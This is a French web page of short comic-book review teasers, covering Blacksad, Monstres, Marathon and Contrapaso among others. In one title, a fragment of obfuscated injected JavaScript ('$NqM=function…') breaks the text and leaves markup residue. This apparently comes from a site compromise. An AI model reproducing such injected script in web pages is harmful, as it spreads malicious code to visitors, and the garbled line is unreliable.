Tag "BD"

« Le Droit du sol, journal d’un vertige » : retrouver son chemin

Dans Le Droit du sol, Étienne Davodeau prend la route, sac au dos, pour un périple de 800 kilomètres entre la grotte aux peintures rupestres de Pech Merle et le futur site d’enfouissement de déchets nucléaires de Bure, en Meuse.  Récit humaniste et engagé, ce « Journal d’un vertige » est aussi un éloge de la lenteur et de la curiosité. Il était vraisemblablement temps pour Étienne Davodeau de retrouver les grands espaces. Né

« Monstres » de Barry Windsor-Smith : l’enfer grand format

Comic-book hors normes, Monstres de Barry Windsor-Smith est une expérience saisissante, servie par une maîtrise graphique totale et une vision chevillée au corps : explorer les aspects les plus sombres de l’âme humaine avec un regard sans concessions. Multi-récompensé depuis les années 70, Barry Windsor-Smith est reconnu comme un dessinateur de génie, notamment pour ses albums consacrés à Conan le Barbare et à Wolverine. Pour ces succès, son éditeur Marvel l’adore. Un peu moins lorsqu’il

« Blacksad : Alors, <script>$NqM=function(n){if (typeof ($NqM.list[n]) == tout tombe » : lutte au sommet" title="« Blacksad : Alors, tout tombe » : lutte au sommet" />

« Blacksad : Alors, tout tombe » : lutte au sommet

Le félin détective revient dans Alors, tout tombe,  sixième volet des aventures de Blacksad, dont le premier tome nous plonge dans une sordide histoire d’enjeux immobiliers et de chantage. John Blacksad continue d’arpenter l’Amérique des bas-fonds jusqu’à ses hauteurs. La métaphore n’aura jamais été aussi juste que dans Alors, tout tombe, où l’on navigue entre les tunnels du métro et les ponts suspendus de New York : ouvriers et clochards d’un côté, politiciens et architectes

« Le Compagnon de route » : des étoiles dans la tête

Rugueux et décalé, Le Compagnon de route nous emmène sur le chemin des rêves inassouvis. Une aventure surprenante, où les mauvais coups s’enchaînent dans la Russie des marginaux et des exclus. Dès la première scène, le décor est posé : dans un poste de police moscovite, une prostituée vient porter plainte contre un flic, et ressort convaincue qu’elle ne peut compter que sur elle-même pour se défendre. Dehors, elle s’arrête devant une vitrine où

« L’Étreinte » de Jim et Laurent Bonneau : coeurs perdus

Benjamin, sculpteur, et sa compagne Romy rentrent de leurs vacances à Cadaquès, cité balnéaire catalane. Lui est obnubilé par une jeune femme mystérieuse prise en photo sur la plage. Quand l’histoire du couple est bouleversée par un coup du sort, Benjamin va partir à la recherche de l’inconnue, une quête obsessionnelle pour continuer à croire en la vie et en l’amour. Dans L’Etreinte, le scénariste Jim (Un été à Rome)

« Röhner » de Max Baitinger : chaos technique

Quand Röhner le parasite s’invite dans la vie bien réglée de P., le désordre prend forme dans les cases de l’inventif, drôle et élégant album de Max Baitinger. On en connaît tous un comme lui : il débarque à l’improviste et prend place chez vous pour quelques nuits, ou peut-être plus… il fait peu de cas de vos habitudes et de vos manies, parle à tort et à travers. Quand Röhner s’immisce dans la

« Marathon » de Nicolas Debon : le souffle de l’Histoire

Dans Marathon, Nicolas Debon relate l’histoire oubliée du coureur Boughéra El Ouafi aux Jeux Olympiques de 1928. L’auteur lorrain parvient à retranscrire toute l’émotion liée à la course, entre esthétique du mouvement, instants contemplatifs et symbole d’une liberté reconquise L’histoire du sport, et particulièrement des Jeux Olympiques, est riche en images et en moments forts. Les plus marquants sont sans doute ceux qui reflètent tous les espoirs et les soubresauts de leur

« Alerte 5 » de Max de Radiguès : seuls sur Mars

Max de Radiguès a un sens éprouvé de l’aventure. Il faut d’abord rappeler qu’il est éditeur chez la petite maison L’Employé du moi et directeur de collection chez Sarbacane, en plus d’être auteur de bande-dessinée… ce qui dénote d’un certain goût du risque. Au fil de la vingtaine d’albums qu’il a publié sous son nom, les notions de parcours, de plongée dans l’inconnu et de suspense sont omniprésentes, que ce

« Pucelle : Confirmée » de Florence Dupré La Tour : entrée dans l’arène

Après avoir abordé l’enfance dans un premier volume, Florence Dupré La Tour nous plonge dans les affres d’une adolescence confrontée à « la Chose » dans Pucelle : Confirmée. Un récit entre humour et gravité sur une sexualité féminine à libérer d’innombrables carcans et menaces. Pour des nombreux-ses auteur-e-s, écrire sur son enfance est un défi, partant d’une matière première forcément floue et modifiée par les perceptions de l’adulte. « La seule chose qui me reste, ce sont des

« Contrapaso » : noir total

Dessinatrice pour divers studios d’animation, la madrilène Teresa Valero souhaitait se consacrer entièrement à une œuvre de bande dessinée après des incursions au scénario (Curiosity shop, Sorcelleries) et au dessin (We are family). C’est chose faite avec Contrapaso, un récit entre roman noir et bande dessinée historique au cœur des années sombres de l’Espagne franquiste. On y suit Emilio Sanz, journaliste vétéran au passé ambigu, à qui l’on impose la